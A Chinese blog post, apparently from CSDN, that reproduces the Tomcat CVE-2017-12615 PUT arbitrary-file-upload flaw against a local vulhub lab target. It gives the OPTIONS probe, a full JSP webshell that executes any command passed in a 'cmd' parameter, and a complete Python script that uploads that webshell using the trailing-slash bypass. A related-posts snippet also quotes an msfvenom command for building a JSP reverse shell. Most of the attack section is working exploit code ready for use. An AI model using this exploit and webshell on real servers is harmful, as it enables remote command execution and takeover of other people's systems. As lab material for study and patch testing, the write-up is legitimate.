Tomcat CVE-2017-12615 PUT任意文件上传

最新推荐文章于 2023-09-09 22:00:00 发布
最新推荐文章于 2023-09-09 22:00:00 发布
阅读量422 收藏
点赞数
分类专栏: 中间件漏洞 文章标签: tomcat 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/116756962
版权

Tomcat CVE-2017-12615 PUT任意文件上传

漏洞原理:传送门

实验环境

主机角色IP
centos8漏洞靶机192.168.1.80
windows10攻击主机(burp)192.168.1.120

实验流程

开启漏洞靶机centos8

# 进入vulhub目录
cd /usr/sbin/vulhub/tomcat/CVE-2017-12615

# 创建docker镜像
docker-compose build

# 启动docker镜像
docker-compose up -d

查看tomcat关键的配置文件

vim Dockerfile

image-20210512110005016

cat /usr/local/tomcat/conf/web.xml | grep ‘<init-param>’

image-20210513163849179

向目标url发送一个options方法的请求,用来获知服务器允许的实际请求(看其中是否有PUT)

OPTIONS /shell.jsp/ HTTP/1.1
Host: 192.168.1.80:8080
Content-Length:5

shell

image-20210512112013273

如上图所示,返回的Allow字段中含有PUT方法,说明服务器允许PUT请求。

尝试使用PUT方法上传一个文件shell.jsp:

image-20210512112827287

用浏览器尝试访问该文件:

image-20210512112845567

如图所示,成功访问。

尝试上传一个webshell,内容如下:

<%@
page language="java"
import="java.util.*,java.io.*"
pageEncoding = "UTF-8"
%>
<%!public static String excuteCmd(String c) {
	StringBuilder line = new StringBuilder();
	try {
		Process pro = Runtime.getRuntime().exec(c);
		BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
		String temp = null;
		while ((temp = buf.readLine()) != null){
			line.append(temp+"\\n");
		}
		buf.close();
	} catch (Exception e) {
		line.append(e.getMessage());
	}
	return line.toString();
}
%>
<%
if(!"".equals(request.getParameter("cmd"))){
	out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{
	out.println(":-)");
}
%>

image-20210512140142646

访问上传的webshell:

image-20210512140251290

成功!

为方便复现漏洞,可以编写一个python脚本:

import http.client,sys
import time

#target = sys.argv[1]
file_name = str(int(time.time()))+'.jsp'   #以时间戳作为文件名,防止重名
body = '''<%@
page language="java"
import="java.util.*,java.io.*"
pageEncoding = "UTF-8"
%>
<%!public static String excuteCmd(String c) {
	StringBuilder line = new StringBuilder();
	try {
		Process pro = Runtime.getRuntime().exec(c);
		BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
		String temp = null;
		while ((temp = buf.readLine()) != null){
			line.append(temp+"\\n");
		}
		buf.close();
	} catch (Exception e) {
		line.append(e.getMessage());
	}
	return line.toString();
	}
%>
<%
if(!"".equals(request.getParameter("cmd"))){
	out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{
	out.println(":-)");}
%>
'''
target = sys.argv[1]     #接收一个参数,作为目标url
try:
    conn = http.client.HTTPConnection(target)    #对目标进行http连接
    conn.request(method='OPTIONS',url="/mapx")         #用options方法对目标url发起请求(路径随意)
    headers = dict(conn.getresponse().getheaders())   #获取响应头,作为一个字典
    #print(headers)
    if 'Allow' in headers and headers['Allow'].find('PUT') > 0:  #查找响应头的Allow字段是否含有PUT
        conn.close()          #关闭http连接
        conn = http.client.HTTPConnection(target)            
        url = "/" + file_name + "/"    #注意,一定要在filename后加/,这样才可以让tomact将shell.jsp/当作非jsp文件,让DefaultServlet去处理
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
        conn.request(method='PUT', url=url, body=body)      #使用PUT方式发送HTTP请求
        res = conn.getresponse()         #获取response对象
        if res.status == 201:
            try:
                #请求上传的文件,校验是否上传成功可被访问
                conn = http.client.HTTPConnection(target)  
                conn.request(method='GET',url=url)  #请求上传的文件
                html = conn.getresponse().read()    #获取respose
                html = html.decode()    
                if file_name in html:      #查找filename是否在html中
                    print('shell:' + target + url[:-1])   #输出文件名和url
                    result = 'vulnerable'
                else:
                    print('upload faild')
                    result = 'vulnerable'
            except Exception as e:
                result = 'not vulnerable'
                print('Error:',e)

        elif res.status == 204:   #204说明文件重名
            result = 'not vulnerable'
            print('file exists')
        else:
            result = 'not vulnerable'
            print('error')
        conn.close()
    else:
        result = 'not vulnerable'
        print('Server not vulnerable')
except Exception as e:
    print('Error',e)

运行python脚本,传入目标url:

image-20210513165430475

访问该文件,并传入命令参数:

image-20210513165531657

成功!

0ak1ey
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat 通过 PUT 方法任意写入文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1079
CVE-2017-12615 对应的漏洞为任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件 。Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件。
Tomcat put任意文件上传
z.mumu的博客
09-10 1233
1.Tomcat8.5.19漏洞 PUT方法任意写文件漏洞(CVE-2017-12615) 打开burp尝试put方法任意文件上传 抓取页面,然后将Get方法改成PUT,注意文件名要/文件名/,然后内容直接空一行写在下面,返回201。 冰蝎连接 也可以使用msf生成jsp的木马进行连接 msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=端口 -f raw > shell.jsp 然后msf设置监听访问 最后就是使用现有的exp 我
任意文件上传
最新发布
cgjil的博客
09-09 476
通过Web 方式,使用HTTP| HTTPS 协议传递命令消息到服务器,并且继承了Web 用户的权限,在服务器上远程执行命令。Web 应用开放了文件上传功能,没有对上传的文件做足够的限制和过滤。WebShell 接收来自于Web 用户的命令,然后在服务器端执行,也称为网站木马、木马后门、网马等。上传文件重命名,尽量少的从客户端获取信息,包括文件名、文件类型、文件内容等;通过恶意文件,利用其他漏洞拿到管理员权限(提权),导致服务器沦陷。Web 服务器开启文件上传功能,Web 用户可以使用该功能。
一句话收录
baidu_38844729的博客
01-16 454
JSP马 带密码的回显cmd马 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<p
CVE-2017-12615 Tomcat PUT 任意文件上传 漏洞利用教程
凝聚力安全团队
11-14 2159
目录漏洞描述影响版本漏洞环境搭建漏洞检测漏洞利用漏洞加固 漏洞描述   在启用HTTP PUT的Windows上运行Apache Tomcat 7.0.0至7.0.79时(例如,通过将Default的只读初始化参数设置为false),可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP,并且服务器将执行其中包含的所有代码。 影响版本 tomcat 7.0.0至7.0.79 漏洞环境搭建 漏洞检测 漏洞利用 漏洞加固 ...
CVE-2017-12615-master.zip
09-04
在`CVE-2017-12615-master.zip`文件中,可能包含了用于演示漏洞利用的工具和脚本。这些工具通常会模拟一个恶意的HTTP请求,其中包含能够触发远程代码执行的OGNL表达式。攻击者可以使用这些工具测试他们的目标系统...
CVE-2017-12615利用脚本
04-16
CVE-2017-12615是一个在Apache Tomcat服务器中发现的安全漏洞,该漏洞允许攻击者通过PUT方法上传恶意文件并执行任意命令,从而对系统造成严重的安全威胁。这个漏洞主要涉及到Tomcat文件上传功能,特别是其处理...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
TomcatPUT的文件上传漏洞(CVE-2017-12615)
weixin_52458793的博客
02-12 1151
详细教程
Apache Tomcat任意文件上传漏洞(CVE-2017-12615)
ran的博客
01-31 2054
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,并且能被服务器执行。2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615CVE-2017-12616。漏洞影响:上传包含任意代码的文件,并且能被服务器执行。放包后再次访问“1.jsp”,发现存在了。
Tomcat中间件PUT漏洞-任意文件上传漏洞
weixin_46411728的博客
08-11 697
Tomcat中间件PUT任意文件上传漏洞
Tomcat PUT的上传漏洞(CVE-2017-12615)
weixin_47417079的博客
08-21 341
Tomcat PUT的上传漏洞(CVE-2017-12615)
CVE-2017-12615Tomcat PUT方法任意文件上传漏洞
weixin_45253622的博客
03-29 6052
CVE-2017-12615Tomcat任意文件上传漏洞 漏洞介绍 在一定条件下,攻击者可以利用漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在安全风险。 漏洞条件: 存在漏洞的Tomcat运行在Windows主机上,并且启用了HTTP PUT请求方法(例如:将readonly初始化参数由默认值设置为false) 影响版本 Apache Tomca
TomcatPUT的上传漏洞(CVE-2017-12615)
小小猪的博客
11-19 3604
Tomcat远程代码执行漏洞复现(CVE-2017-12615) 漏洞描述: 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 受影响的版本: Apache Tomcat 7.0.0 to 7.0.79 利用条件: Apache
Tomcat PUT方法任意写文件漏洞复现(CVE-2017-12615
whojoe的博客
07-11 518
ATomcat PUT方法任意写文件漏洞复现(CVE-2017-12615)前言环境搭建漏洞复现参考文章 前言 影响版本 Apache Tomcat 7.0.0 - 7.0.81 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2017-12629-XXE/cd vulhub
Tomcat任意文件上传CVE-2017-12615
m0_73720136的博客
05-07 1088
掌握文件上传中的Tomcat任意文件上传CVE-2017-12615)漏洞影响的Tomcat版本以及配置文件,利用Burp Suite工具抓取数据包,将数据包内容修改,请求方式修改为PUT方式,上传新建的jsp脚本文件,文件内容可以任意编写,也可以是木马。1. NTFS文件流2. 文件名相关限制可以采取一些方法来绕过限制,比如Windows中文件名不能以空格结尾,在文件名后面加空格"%20",也可以加斜杠"/"。
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615
m0_52701599的博客
02-12 960
Tomcat PUT方法任意写文件漏洞
cve-2017-12615脚本
09-04
CVE-2017-12615是一个由Apache Tomcat服务器引起的漏洞,它存在Tomcat服务器的默认配置中。该漏洞使得攻击者能够通过进行远程命令执行来获取服务器的控制权。 该脚本的实现过程如下: 1. 首先,通过发送特制的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值